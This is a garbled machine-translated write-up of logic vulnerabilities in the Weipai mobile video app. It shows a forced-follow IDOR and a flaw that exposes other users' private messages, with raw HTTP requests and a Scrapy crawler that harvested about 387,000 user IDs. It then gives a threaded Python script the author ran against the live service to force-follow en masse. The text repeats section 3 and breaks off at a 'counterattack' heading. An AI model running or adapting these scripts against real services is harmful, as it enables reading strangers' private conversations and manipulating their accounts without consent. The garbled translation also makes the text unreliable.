From scratch-micro-shot APP Vulnerability
Micro-camera is the most popular mobile video social APP on the mobile Internet. It has unique video effects such as skin whitening and skin whitening, the list of social and photography apps in APP stores for iPhone and Android phones is among the top, and is the main mobile product of Beijing Yunxiao online Technology Co., Ltd. Micro-shooting is also short for micro-shooting, refers to the center point, focus, characteristics, advantages and a series of prominent or distinctive places to enlarge or extend, A shooting method recorded in the form of images.
Micro-camera has a large number of "Bai fumei" self-timer videos published daily. The number of users once rose to several million. How can new users be flattered?
1. vulnerability details
After installing the APP on your mobile phone, you can immediately see various types of videos. Of course, this is not the focus. After opening the mobile network proxy, the computer listened to APP traffic. After trying some common vulnerabilities, the computer did not make much progress, so it turned and ran to the side of the logical vulnerability. After paying attention to user clicks, a request like this will be POST:
POST /follow_user HTTP/1.1Content-Length: 82Content-Type: application/x-www-form-urlencodedHost: w1.weipai.cnConnection: Keep-AliveUser-Agent: android-async-http/1.4.1 (weipaipro)Accept-Encoding: gzipPhone-Type: android_2013022_4.2.1os: androidChannel: (App-Name: weipaiApi-Version: 8Client-Version: 0.99.9.2Device-Uuid: 9609b1be908****e9beb5442166c7bdfd1ad2e22Weipai-Token: 54ba****7373cWeipai-UserId: 54ba1650a5640b57078b****Phone-Number:Push-Id: com.weipai.weipaiproKernel-Version: 15Com-Id: weipaito_user_id=54ba1650a5640b57078b****&from_user_id=53c299e79d67d962598b****&type=add
Here, to_user_id is my account user_id, and from_user_id is the user_id of the user concerned. Here, the two are exchanged to complete the function of the other party to focus on the specified user, that is, the first logical vulnerability.
In addition, this APP has a very core function: conversation, oh, not conversation. The APP sends a request to the server every few minutes to update the dialog message in a timely manner:
GET /pm/new?count=20&weipai_userid=54ba1650a5640b57078b**** HTTP/1.1Host: pm.weipai.cnConnection: Keep-AliveUser-Agent: android-async-http/1.4.1 (weipaipro)Accept-Encoding: gzipPhone-Type: android_2013022_4.2.1os: androidChannel: (‚App-Name: weipaiApi-Version: 8Client-Version: 0.99.9.2
We can replace weipai_userid in this GET request with a user ID to view the conversation records of the other party. Oh no! Is the dialog record.
2. crawler cooperation
Whether it is the first "fan farming Vulnerability" or "arbitrary message Viewing Vulnerability", there is a premise that the target user's weipai_userid is obtained, otherwise, both "click" and "any" are empty discussions. JUST DO IT
We found this API, which is a GET request and provides a list of user fans:
Http://w1.weipai.cn/user_fans_list? Count = 20 & relative = after & uid = 50f8ff597f3494a70200 ****
For crawlers, we use Scrapy to write and use a random user_id as the seed source to crawl data in sequence:
The slave user is enough (the user_id_list in which Bai fumei and diaosi coexist) to prepare for the reverse attack.
3. Vulnerability Exploitation
After we have vulnerabilities and vulnerabilities, we start to take the first step of the counterattack. We will first flat the number of fans to the top. Here we need a script:
#!/usr/bin/env python# coding=utf-8# author=fimport scrapyimport jsonfrom weipai.items import WeipaiItemclass weipai_spider(scrapy.Spider): allowd_domains = ["http://w1.weipai.cn/"] start_urls = ["http://w1.weipai.cn/user_fans_list?count=1000&relative=after&uid=50f8ff597f3494a702000066"] uid_list = [] def parse(self, response): item = WeipaiItem() all_data = json.loads(response.body) for id in all_data['user_list']: try: if id['user_id'] not in self.uid_list: self.uid_list.append(id['user_id']) item['user_id'] = id['user_id'] item['url'] = "http://w1.weipai.cn/user_fans_list?count=1000&relative=after&uid=%s"%id['user_id'] yield item yield self.make_requests_from_url(item['url']) except Exception,e: pass
You have crawled 400,000 user_id:
$ weipai wc weipai_spider_user_id.json387451 387451 8186275 weipai_spider_user_id.json
The slave user is enough (the user_id_list in which Bai fumei and diaosi coexist) to prepare for the reverse attack.
3. Vulnerability Exploitation
After we have vulnerabilities and vulnerabilities, we start to take the first step of the counterattack. We will first flat the number of fans to the top. Here we need a script:
#!/usr/bin/env python# coding=utf8# author=evi1m0@2015import requestsimport threadpool as tpf_user = open('./weipai.txt', 'r')post_url = 'http://w1.weipai.cn/follow_user'def start(test): flag = 0 for user in f_user.readlines(): post_data = { 'to_user_id':'54ba1650a5640b57078b****', 'from_user_id': user[:-1], 'type': 'add',} try: req = requests.post(post_url, data=post_data, timeout=5) flag += 1 print '[+] %d : %s' % (flag, req.text) except: continueargs = [ ['http://xxx.com', 'test'],]pool = tp.ThreadPool(200)reqs = tp.makeRequests(start, args)[pool.putRequest(req) for req in reqs]pool.wait()
It was very easy to RUN the script, but it was not very fast after observation. So I put the script on several servers in Hong Kong and abroad, then we cut several parts of the user_id list and then fell asleep.
Soon I woke up, and there were no beautiful beasts in my dream. I logged on to the server and stopped the scripts. I picked up the Android mobile phone that kept shaking and found that I had received hundreds of conversations, of course, the number of fans has reached 155,835.
4. counterattack